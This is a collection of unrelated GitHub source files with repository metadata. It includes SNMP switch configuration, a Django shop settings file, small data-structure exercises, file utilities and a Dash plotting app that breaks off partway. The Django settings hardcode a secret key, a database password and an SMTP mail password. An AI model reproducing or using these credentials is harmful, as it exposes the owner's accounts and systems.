exsh.clicmd("configure snmp sysLocation %s" % snmplocation, True)
exsh.clicmd("configure snmp sysContact %s" % snmpcontact, True)
if (snmptrapcount >= 1):
exsh.clicmd("configure snmp add trapreceiver %s community %s" % (snmptrap1,snmproname), True)
if (snmptrapcount >= 2):
exsh.clicmd("configure snmp add trapreceiver %s community %s" % (snmptrap2,snmproname), True)
if (snmptrapcount >= 3):
exsh.clicmd("configure snmp add trapreceiver %s community %s" % (snmptrap3,snmproname), True)
	if (re.match("yes", ynsnmpcommadd)):
exsh.clicmd("configure snmp add community readwrite %s" % snmprwname, True)
exsh.clicmd("configure snmp add community readonly %s" % snmproname, True)
exsh.clicmd("create log entry \"New SNMP Communities Created\"", True)
print("New SNMP Communities Created")
		if (re.match("yes", ynsnmpcommrem)):
exsh.clicmd("configure snmp delete community readwrite private", True)
exsh.clicmd("configure snmp delete community readonly public", True)
exsh.clicmd("create log entry \"Default SNMP Communities Removed\"", True)
print("Default SNMP Communities Removed")
else:
exsh.clicmd("create log entry \"Default SNMP Communities NOT Removed\"", True)
print("Default SNMP Communities NOT Removed")
else:
	if (re.match("yes", ynsnmpdisable)):
exsh.clicmd("create log entry \"Disabling SNMP access\"", True)
print("Disabling SNMP access")
exsh.clicmd("disable snmp access snmp-v1v2", True)
else:
exsh.clicmd("create log entry \"SNMP Not Configured\"", True)
print("SNMP Not Configured")
|
[
"stewilliams@extremenetworks.com"
] |
stewilliams@extremenetworks.com
|
c44a19da41a435781f04041a1e7bd5b9d3219591
|
b11b38a667a69969d268634e2c3de9f1b624823b
|
/tren.py
|
c2915fce05587062083416208d30bb2aa4d2d6b6
|
[] |
no_license
|
minc84/learn
|
e68013e51fe846d0d41831e70cf3694154a152a8
|
22882b24b24ba386b0baf84055e08894c8a77053
|
refs/heads/master
| 2023-03-19T23:18:26.010374
| 2021-01-13T13:44:46
| 2021-01-13T13:44:46
| 278,613,516
| 0
| 0
| null | 2021-03-20T04:41:50
| 2020-07-10T11:10:07
|
Python
|
UTF-8
|
Python
| false
| false
| 441
|
py
|
import sqlite3 as sq
with sq.connect("saper.db") as con:
cur = con.cursor()
cur.execute(" select * from users where old > 20 AND score < 40 ORDER BY old DESC LIMIT 1")
res = cur.fetchall()
for value in cur.execute(" select name, score from users WHERE name LIKE 'ВАСИЛИСА'"):
print(value)
cur.execute("select name, score from users WHERE name LIKE 'ВАСИЛИСА' AND score > 1100")
res = cur.fetchone()
print(res)
|
[
"nesterovish@yandex.ru"
] |
nesterovish@yandex.ru
|
c4f671e9a75ffab245e4527cf3a74964ce8ebeb3
|
76b8e0895f81f021a3578ce9ac23d4b87cf5aeb4
|
/base/__init__.py
|
d7744914dda88bac878d220517b8d117b93f89a7
|
[] |
no_license
|
kilomeow/pick-a-bot
|
ec0d4934866fc7a9a7afd46053524da93574a78d
|
56566022b5ad5966a4183baf188e3ca259f2aba3
|
refs/heads/master
| 2023-04-07T14:00:28.270458
| 2021-04-19T06:56:57
| 2021-04-19T06:56:57
| 258,882,010
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
from .session import *
from .trigger import *
from .action import *
from .context import *
from .promise import *
|
[
"dest@disr.it"
] |
dest@disr.it
|
9107cd52b4f5cb29c06fa7c3b10e07dbb89fe3a2
|
e230e3c1d6935d36b7074390f096d782cabd75af
|
/dailyfresh/settings.py
|
520e1cbe63fe0018a6d3e7702bc98f883808c38e
|
[] |
no_license
|
PeterZhangxing/dailyfresh_ori
|
603e7e42457d27ffefb6a4601f9b6826a3a55a6f
|
19b6d667d6f49a528aeb6f4430e2537c933936f0
|
refs/heads/master
| 2020-12-02T01:41:32.160278
| 2019-12-30T04:24:50
| 2019-12-30T04:24:50
| 230,846,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,607
|
py
|
"""
Django settings for dailyfresh project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,os.path.join(BASE_DIR,'apps'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h2)2bq3(3=-9a#8m$t-ci9t91o*tr%xs%@3g2^e-4^)i$(335l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
    'tinymce', # rich text editor
    'haystack', # register the full-text search framework
    'user', # user module
    'goods', # goods module
    'cart', # shopping cart module
    'order', # order module
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dailyfresh.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dailyfresh.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'dailyfresh',
'USER': 'zx2005',
'PASSWORD': 'redhat',
'HOST': '10.1.1.128',
'PORT':3306,
}
}
# tell Django's built-in auth system which model class to use
AUTH_USER_MODEL='user.User'
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans' # localization
TIME_ZONE = 'Asia/Shanghai' # localization
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR,'static'),
]
# rich text editor configuration
TINYMCE_DEFAULT_CONFIG = {
'theme': 'advance',
'width': 600,
'height': 400,
}
# email sending configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# SMTP server address
EMAIL_HOST = 'smtp.qq.com'
EMAIL_PORT = 25
# mailbox used to send the mail
EMAIL_HOST_USER = '99360681@qq.com'
# client authorization password configured in the mailbox settings
EMAIL_HOST_PASSWORD = 'cdbnlajjhfctbjhb'
# the sender shown to recipients
EMAIL_FROM = '天天吃屎<99360681@qq.com>'
# Django cache configuration
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://10.1.1.128:6379/9",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
# store sessions in the cache configured above
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_CACHE_ALIAS = "default"
# default redirect URL after Django's built-in authentication fails
LOGIN_URL='/user/login'
# set Django's file storage class
DEFAULT_FILE_STORAGE='utils.fdfs.storage.FdfsStorage'
# path of the client.conf file used by fdfs
FDFS_CLIENT_CONF='./utils/fdfs/client.conf'
# IP and port of nginx on the fdfs storage server
FDFS_URL='http://10.1.1.128:8888/'
# full-text search framework configuration
HAYSTACK_CONNECTIONS = {
    'default': {
        # use the whoosh engine
        # 'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
        'ENGINE': 'haystack.backends.whoosh_cn_backend.WhooshEngine',
        # index file path
        'PATH': os.path.join(BASE_DIR, 'whoosh_index'),
    }
}
# automatically regenerate the index when data is added, modified, or deleted
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
# number of search results displayed per page
HAYSTACK_SEARCH_RESULTS_PER_PAGE=1
|
[
"964725349@qq.com"
] |
964725349@qq.com
|
bea5e52fc879f85fba8493bf6a11bf65648c44ee
|
05f3f5537ef401946118b07ab0161bcce04cb3a4
|
/main_page/migrations/0004_auto_20210716_0019.py
|
4a723f5cbd4b740ccc1a0cfcd85a88ae8752f501
|
[] |
no_license
|
abhishekotari21/IAFpedia
|
73f8a96ac55d385be98d5b16ea0685428495eb02
|
d2fa096da86ca7ba976fae2242bcf7d362e0f3c5
|
refs/heads/master
| 2023-07-08T09:25:15.408635
| 2021-08-07T17:48:04
| 2021-08-07T17:48:04
| 384,144,297
| 0
| 0
| null | 2021-07-09T10:40:44
| 2021-07-08T14:04:06
|
HTML
|
UTF-8
|
Python
| false
| false
| 333
|
py
|
# Generated by Django 3.1.4 on 2021-07-15 18:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main_page', '0003_hisevent'),
]
operations = [
migrations.RenameModel(
old_name='HisEvent',
new_name='HistoricalEvent',
),
]
|
[
"omkar3602@gmail.com"
] |
omkar3602@gmail.com
|
8c1931de214702eae66c4588ab24ad31368fbe5f
|
6295b232fe750e4d49c40e093af3925b3ae14769
|
/max_stack_da.py
|
b3d5491a3be268ed75ae92c34cbe810fb77eb10f
|
[] |
no_license
|
palaquibay329/QueueStackDynamicArrayfromStaticArray
|
426e38a5d2257d4543c85a9450299ac3bcb0842a
|
f6178051d7d28b23ba4baff68b0f3e4a0177fc5a
|
refs/heads/master
| 2023-08-22T03:51:35.704585
| 2021-10-17T03:53:47
| 2021-10-17T03:53:47
| 418,012,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,829
|
py
|
# Course: CS261 - Data Structures
# Student Name: Edgar Palaquibay
# Assignment: 2
# Description: This script is a max stack implementation using dynamic arrays. The newly implemented
# methods are push(), pop(), top(), get_max().
from dynamic_array import *
class StackException(Exception):
"""
Custom exception to be used by Stack class
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
pass
class MaxStack:
def __init__(self):
"""
Init new stack based on Dynamic Array
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
self.da_val = DynamicArray()
self.da_max = DynamicArray()
def __str__(self) -> str:
"""
Return content of stack in human-readable form
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
out = "MAX STACK: " + str(self.da_val.length()) + " elements. ["
out += ', '.join([str(self.da_val[i]) for i in range(self.da_val.length())])
return out + ']'
def is_empty(self) -> bool:
"""
Return True is the stack is empty, False otherwise
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
return self.da_val.is_empty()
def size(self) -> int:
"""
Return number of elements currently in the stack
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
return self.da_val.length()
# -----------------------------------------------------------------------
def push(self, value: object) -> None:
"""
Input: value (object)
Output: N/A
        This function will add a new element to the top of the stack
"""
if self.size() == 0:
self.da_val.append(value)
if self.da_max.length() == 0:
self.da_max.append(value)
elif value <= self.da_max.get_at_index(self.da_max.length()-1):
arg = self.da_max.get_at_index(self.da_max.length()-1)
self.da_max.append(arg) #append the current max of da_max onto da_max again
self.da_val.append(value)
else:
self.da_max.append(value) #append the value argument to da_max since it's larger than current max
self.da_val.append(value)
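        # invariant: the top of da_max always equals max(da_val), so get_max()
        # and pop() remain O(1) by reading/removing the tops of both arrays
        # in lock-step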
def pop(self) -> object:
"""
Input: N/A
Output: object
This function returns the top value of the da_val stack, it also removes the top value from da_max stack but
does not return it
"""
if self.is_empty():
raise StackException()
else:
value = self.da_val.get_at_index(self.size() - 1) #capture the top value of the stack before removing
self.da_val.remove_at_index(self.size() - 1)
self.da_max.remove_at_index(self.da_max.length() - 1)
return value
def top(self) -> object:
"""
Input: N/A
Output: object
This function will return the top value of the da_val stack and raise an exception if empty
"""
if self.is_empty():
raise StackException()
return self.da_val.get_at_index(self.da_val.length() - 1) #return top of stack
def get_max(self) -> object:
"""
Input: N/A
Output: object
This function returns the maximum value that is in the stack, if the stack is empty the method raises a
"StackException"
"""
if self.is_empty():
raise StackException()
return self.da_max.data[self.da_max.length() - 1] #return top of max stack
# ------------------- BASIC TESTING -----------------------------------------
if __name__ == "__main__":
print("\n# push example 1")
s = MaxStack()
print(s)
for value in [1, 2, 3, 4, 5]:
s.push(value)
print(s)
print("\n# pop example 1")
s = MaxStack()
try:
print(s.pop())
except Exception as e:
print("Exception:", type(e))
for value in [1, 2, 3, 4, 5]:
s.push(value)
for i in range(6):
try:
print(s.pop())
except Exception as e:
print("Exception:", type(e))
print("\n# top example 1")
s = MaxStack()
try:
s.top()
except Exception as e:
print("No elements in stack", type(e))
s.push(10)
s.push(20)
print(s)
print(s.top())
print(s.top())
print(s)
print('\n# get_max example 1')
s = MaxStack()
for value in [1, -20, 15, 21, 21, 40, 50]:
print(s, ' ', end='')
try:
print(s.get_max())
except Exception as e:
print(type(e))
s.push(value)
while not s.is_empty():
print(s.size(), end='')
print(' Pop value:', s.pop(), ' get_max after: ', end='')
try:
print(s.get_max())
except Exception as e:
print(type(e))
|
[
"edgarpalaquibay@MacBook-Pro-2.fios-router.home"
] |
edgarpalaquibay@MacBook-Pro-2.fios-router.home
|
ea25f40064c0389cfee15171a0479f3f66af28c1
|
84827140ca49fb71bccb79d7b6e19b2d2ae7ada4
|
/profile_test.py
|
5b32caf3420cb9502fad2b7ec6dca9f49035969e
|
[
"BSD-2-Clause"
] |
permissive
|
CyclingNinja/sunkit-sst
|
df312fc51440689885fedc29a5e48f749f9e8445
|
3abb8676eb0f6e6881abf8159777bb1ee3d30e01
|
refs/heads/master
| 2021-01-14T13:38:47.648658
| 2015-01-30T14:09:38
| 2015-01-30T14:09:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,115
|
py
|
from __future__ import absolute_import, division
from sunkitsst.sstmap import get_header_item_group, SSTMap
import sunpy.map as smap
from sunkitsst.read_cubes import read_cubes
from sunkitsst.visualisation import cube_explorer
import numpy as np
import matplotlib.pyplot as plt
import glob
plt.ion()
smap.Map.register(SSTMap, SSTMap.is_source_for)
imfile = '/data/SST/fastrbe/sstdata.icube'
spfile = '/data/SST/fastrbe/sstdata.sp.icube'
im_header, outmemmap, sp_header, sp_cube = read_cubes(imfile, spfile, memmap = True)
files = glob.glob("/data/Mounted/SWAT/fastrbe/sst2sdo/fits/sst/halpha/*.fits")
files.sort()
first_maps = smap.Map(files[0])
cadence = 2.195 #s
x = get_header_item_group(first_maps.meta, 'lpos_')
x.sort()
waves = [item[1] for item in x]
waves.sort()
axis_range = [np.arange(0,cadence*outmemmap.shape[0],cadence), waves] + [first_maps.yrange] + [first_maps.xrange]
fig = plt.figure(figsize=(16,14))
moose = cube_explorer.PlotInteractor(outmemmap, first_maps.meta['cdelt1'], '/home/nabobalis/Dropbox/SavedSlits/',
axis_range=None, cmap='Greys_r', fig=fig, colorbar=True)
|
[
"nabil.freij@gmail.com"
] |
nabil.freij@gmail.com
|
8aba048efabe65a374ecb7ea6a348edc52b17054
|
bc33dcd135f6682a70d9423a9d30108640bfd1c7
|
/Python Snippets/helpers/file.py
|
ccd799a93dca7a2c66b0f8b1b153040df1d4da18
|
[
"MIT"
] |
permissive
|
wolfnfox/Code-Snippets
|
3bc95e3d8692396f649a89a61f456c75d7d46738
|
993cb2b273d538bdeb76ff3a39fa41a92a6282de
|
refs/heads/master
| 2020-06-23T10:18:35.044448
| 2019-10-08T10:15:20
| 2019-10-08T10:15:20
| 198,594,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,049
|
py
|
import logging, os, shutil
import numpy as np
from typing import Union
def append_all_text(text: str,filename: str,encoding: str=r'utf-8') -> bool:
if not isinstance(text,str):
raise ValueError('Invalid argument for <text>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(text)))
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(encoding,str):
raise ValueError('Invalid argument for <encoding>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(encoding)))
if not fileexists(filename):
raise FileNotFoundError()
return _writefile(text,filename,'at',encoding)
def copy(fromfilename: str,tofilename: str=None,overwrite: bool=False) -> str:
if not isinstance(fromfilename,str):
raise ValueError('Invalid argument for <fromfilename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(fromfilename)))
if tofilename and not isinstance(tofilename,str):
raise ValueError('Invalid argument for <tofilename>.\nAccepted types: '+str(None)+', '+str(str)+'\nGot type: '+str(type(tofilename)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if not fileexists(fromfilename):
raise FileNotFoundError()
if (not tofilename):
tofilename = fromfilename
if (not overwrite):
tofilename = _increment_filename(tofilename)
shutil.copy2(fromfilename,tofilename)
else:
if fileexists(tofilename):
move(fromfilename,tofilename,overwrite)
else:
shutil.copy2(fromfilename,tofilename)
logging.info('Copied file: '+str(fromfilename))
logging.info('Copied to: '+str(tofilename))
return tofilename
def delete(filename: str) -> bool:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not fileexists(filename):
raise FileNotFoundError
os.remove(filename)
logging.info('Deleted file: '+str(filename))
return True
def fileexists(filename: str) -> bool:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
return os.path.isfile(filename)
def filesize(filename: str,units: str=None) -> int:
'''Returns filesize (defaults to 'KB')\n
Options: 'B', 'KB', or 'MB' '''
if not fileexists(filename):
raise FileNotFoundError
if units not in ['B', 'KB', 'MB', None]:
raise ValueError('Invalid argument for <units>.\nAccepted types: '+str(str)+' \'B\', \'KB\', \'MB\' or '+str(None)+'\nGot type: '+str(type(units))+' \''+str(units)+'\'')
filesize = os.stat(filename).st_size
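    # sizes of at least one whole unit are rounded up to an integer count of
    # units; smaller sizes come back as a fraction of the unit, rounded up at
    # the third decimal place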
if (units == 'KB') or (units == None):
if (filesize > 1024):
filesize = int(np.ceil(filesize/1024))
else:
filesize = np.ceil((filesize*1000)/1024)/1000
if units == 'MB':
if (filesize > (1024**2)):
filesize = int(np.ceil(filesize/(1024**2)))
else:
filesize = np.ceil((filesize*1000**2)/(1024**2)/(1000))/1000
return filesize
def get_extension(filename: str) -> str:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
return os.path.splitext(filename)[-1]
def move(fromfilename: str,tofilename: str,overwrite: bool=True) -> str:
if not isinstance(fromfilename,str):
raise ValueError('Invalid argument for <fromfilename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(fromfilename)))
if not isinstance(tofilename,str):
raise ValueError('Invalid argument for <tofilename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(tofilename)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if fileexists(tofilename) and (not overwrite):
tofilename = _increment_filename(tofilename)
shutil.move(fromfilename,tofilename)
logging.info('Moved file: '+str(fromfilename))
logging.info('Moved to: '+str(tofilename))
return tofilename
def read_all_bytes(filename: str) -> bytes:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not fileexists(filename):
raise FileNotFoundError()
return _readfile(filename,'rb')
def read_all_text(filename: str,encoding: str=r'utf-8') -> str:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(encoding,str):
raise ValueError('Invalid argument for <encoding>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(encoding)))
if not fileexists(filename):
raise FileNotFoundError()
return _readfile(filename,'rt',encoding)
def write_all_bytes(bytesdata: bytes,filename: str,overwrite: bool=True) -> bool:
if not isinstance(bytesdata,bytes):
raise ValueError('Invalid argument for <bytesdata>.\nAccepted types: '+str(bytes)+'\nGot type: '+str(type(bytesdata)))
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if fileexists(filename) and not overwrite:
raise FileExistsError()
return _writefile(bytesdata,filename,'wb')
def write_all_text(text: str,filename: str,encoding: str=r'utf-8',overwrite: bool=True) -> bool:
if not isinstance(text,str):
raise ValueError('Invalid argument for <text>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(text)))
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(encoding,str):
raise ValueError('Invalid argument for <encoding>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(encoding)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if fileexists(filename) and not overwrite:
raise FileExistsError()
return _writefile(text,filename,'wt',encoding)
def _increment_filename(filename: str) -> str:
'''Private function to generate incremented filename if the input <filename> already exists.\n
Otherwise, returns the <filename> unaltered.'''
if not fileexists(filename):
return filename
else:
i = 1
ext = get_extension(filename)
newfilename = filename.replace(ext,'('+str(i)+')'+ext)
while fileexists(newfilename):
i += 1
newfilename = filename.replace(ext,'('+str(i)+')'+ext)
return newfilename
def _readfile(filename: str,options: str,encoding: str=None) -> Union[bytes,str]:
'''Private function for reading a file in full.'''
if encoding:
with open(filename,options,encoding=encoding) as fopen:
data = fopen.read()
else:
with open(filename,options) as fopen:
data = fopen.read()
return data
def _writefile(data: Union[bytes,str],filename: str,options: str,encoding: str=None) -> bool:
'''Private function for wrapping io.open'''
if encoding:
with open(filename,options,encoding=encoding) as fopen:
fopen.write(data)
else:
with open(filename,options) as fopen:
fopen.write(data)
return True
|
[
"thomasf@cleardata.co.uk"
] |
thomasf@cleardata.co.uk
|
c36b8f1787c7aa2a5b3eacac7ad71daf101b0922
|
1d4f3a96f1c89ed617a6106f64dc66ece645abc7
|
/data_structure/tree/isBST.py
|
6bd337db7e3e0f2b1cd36cceedf4d540ddf3559b
|
[] |
no_license
|
RahulBhoir/Python-Projects
|
8f85504aa4a09ae8778d4a6775eed4e831b43c98
|
ae59dc49f2a6a52c3eb391e412a677f8d08e3ce3
|
refs/heads/master
| 2021-07-24T12:28:32.202481
| 2021-06-30T10:42:06
| 2021-06-30T10:42:06
| 170,374,879
| 1
| 0
| null | 2020-12-20T17:43:16
| 2019-02-12T19:07:12
|
Python
|
UTF-8
|
Python
| false
| false
| 716
|
py
|
root = None
max_value = 100000
min_value = -100000
class Node():
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def isBST(root, min_value, max_value):
if root is None:
return True
if (root.data < max_value and root.data > min_value and
isBST(root.left, min_value, root.data) and isBST(root.right, root.data, max_value)):
return True
else:
return False
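# The bounds tighten on the way down: recursing left caps max_value at the
# parent's key and recursing right raises min_value, so each node is checked
# against every ancestor constraint in one O(n) traversal.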
root = Node(11)
root.left = Node(9)
root.right = Node(13)
root.left.left = Node(7)
root.left.right = Node(10)
root.right.left = Node(12)
root.right.right = Node(15)
root.right.right.left = Node(14)
tree = isBST(root, min_value, max_value)
print(tree)
|
[
"rahulpbhoir@outlook.com"
] |
rahulpbhoir@outlook.com
|
273b8c7282b3d2ecbeda4d37b4950bdf457546e9
|
c2a9dc489f924e8d96ae3b9df83f4bb189adb563
|
/assignments/10AlternaCaracteres/src/exercise.py
|
43ea541b1b3bb4e8478d0155b1b1a75da9ad89aa
|
[] |
no_license
|
Cursoi-TC1028/Examen-Parcial
|
a018a80c6e9050cc91e0dfc8ad4334ac379d7e37
|
69ca6414f5c6b50312645a5f4eef370235aca49e
|
refs/heads/main
| 2023-07-24T10:31:44.733594
| 2021-09-09T04:20:01
| 2021-09-09T04:20:01
| 404,479,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
def main():
    #write your code below this line
    n = int(input())
    cont = 1
    while cont <= n:
        if cont % 2 != 0:
            print("#")
        else:
            print("%")
        cont += 1
if __name__=='__main__':
main()
|
[
"69440193+mannyRam24-Mter@users.noreply.github.com"
] |
69440193+mannyRam24-Mter@users.noreply.github.com
|
8a778a834551e872b7c730e425b78c860d4a6eaa
|
71854d518b0513b4e09e82cf38dbd3dd2d6f44f8
|
/apptesting.py
|
47374d83ae4d8da99289699f0fd06818497c2077
|
[] |
no_license
|
hcxie/linkedin-datavisual-app-testing
|
5d0fc613f50bb26ef09fa4ce5f63d06299a0c813
|
e08ae54348f65967b53d781e007a6e13697016fd
|
refs/heads/master
| 2020-05-19T22:36:21.201983
| 2019-05-06T22:39:50
| 2019-05-06T22:39:50
| 185,249,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,478
|
py
|
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dash.dependencies import Input, Output
import plotly.graph_objs as go
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
def read_merge_data(filename):
df=pd.read_csv(filename)
df.set_index(pd.DatetimeIndex(df['date']),inplace=True)
df['yearmonth']=pd.to_datetime(df['date'], format='%Y/%m').map(lambda x: x.year)
df.drop(['date'],axis=1,inplace=True)
return df
tempdf=read_merge_data('it_merge_df.csv')
x_labels=tempdf['yearmonth']
available_indicators=list(tempdf.columns[0:2])
available_indicators2=list(tempdf.columns[2:7])
sector_list={
1:'real_estate',#XLRE
2:'utilities',#XLU
3:'it',#XLK
4:'financial',#XLF
5:'healthcare',#XLV
6:'consumer_staples',#XLP
7:'consumer_discretionary',#XLY
8:'basic_material',#XLB
9:'energy',#XLE
10:'industrials'}#XLI
sector_name=[val for key,val in sector_list.items()]
server = app.server
app.layout = html.Div([
html.Div([
html.Div([
html.Label('Sector Dropdown'),
dcc.Dropdown(
id='sector_dropdown',
options=[
{'label': 'Real Estate', 'value': 1},
{'label': 'Utilities', 'value': 2},
{'label': 'IT', 'value': 3},
{'label': 'Financial', 'value': 4},
{'label': 'Healthcare', 'value': 5},
{'label': 'Consumer Staples', 'value': 6},
{'label': 'Consumer Discretionary', 'value': 7},
{'label': 'Basic Material', 'value': 8},
{'label': 'Energy', 'value': 9},
{'label': 'Industrials', 'value': 10}
],
value=[3],
multi=True
)],
style={'width': '48%', 'display': 'inline-block'}),
html.Div([
html.Label('Linkedin info Dropdown'),
dcc.Dropdown(
id='yaxis-column',
options=[{'label': i, 'value': i} for i in available_indicators],
value='employees_on_platform'
),
],style={'width': '48%', 'float': 'right', 'display': 'inline-block'})
]),
dcc.Graph(id='indicator-graphic'),
html.Div([
html.Label('time-slider'),
dcc.Slider(
id='year--slider',
min=x_labels.min(),
max=x_labels.max(),
value=x_labels.max(),
marks={str(year): str(year)[2:] for year in x_labels.unique()},
step=20
)],
style={'width': '99%'}),
html.Div([
html.Div([
html.Label('Stock Feature'),
dcc.Dropdown(
id='yaxis-column2',
options=[{'label': i, 'value': i} for i in available_indicators2],
value='adj_close_stock'
),
],style={'width': '99%'})
]),
dcc.Graph(id='indicator-graphic2'),
html.Div([
html.Label('time-slider'),
dcc.Slider(
id='year--slider2',
min=x_labels.min(),
max=x_labels.max(),
value=x_labels.max(),
marks={str(year): str(year)[2:] for year in x_labels.unique()},
step=20
)],
style={'width': '99%'}),
])
@app.callback(
Output('indicator-graphic', 'figure'),
[Input('year--slider', 'value'),
Input('yaxis-column', 'value'),
Input('sector_dropdown', 'value'),
])
def update_graph(selected_year,yaxis_column_name,sector_dropdown):
traces=[]
for i in sector_dropdown:
sector_file_name=sector_list[i]+'_merge_df.csv'
tempdf=read_merge_data(sector_file_name)
sector_tempdf=tempdf[tempdf['yearmonth']<=selected_year]
traces.append(go.Scatter(
x=sector_tempdf.index,
y=sector_tempdf[yaxis_column_name],
#text=df_by_continent['country'],
mode='lines',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
))
return {
'data': traces,
'layout': go.Layout(
xaxis={
'title': 'Year',
},
yaxis={
'title': yaxis_column_name,
},
margin={'l': 40, 'b': 40, 't': 10, 'r': 0},
hovermode='closest'
)
}
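# Each dropdown/slider change above re-reads the selected sectors' CSVs,
# truncates them at the slider year, and redraws every trace; the second
# callback below repeats the same pattern for the chosen stock feature.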
@app.callback(
Output('indicator-graphic2', 'figure'),
[Input('year--slider2', 'value'),
Input('yaxis-column2', 'value'),
Input('sector_dropdown', 'value'),
])
def update_graph2(selected_year,yaxis_column_name,sector_dropdown):  # distinct name so the first callback function is not shadowed
traces=[]
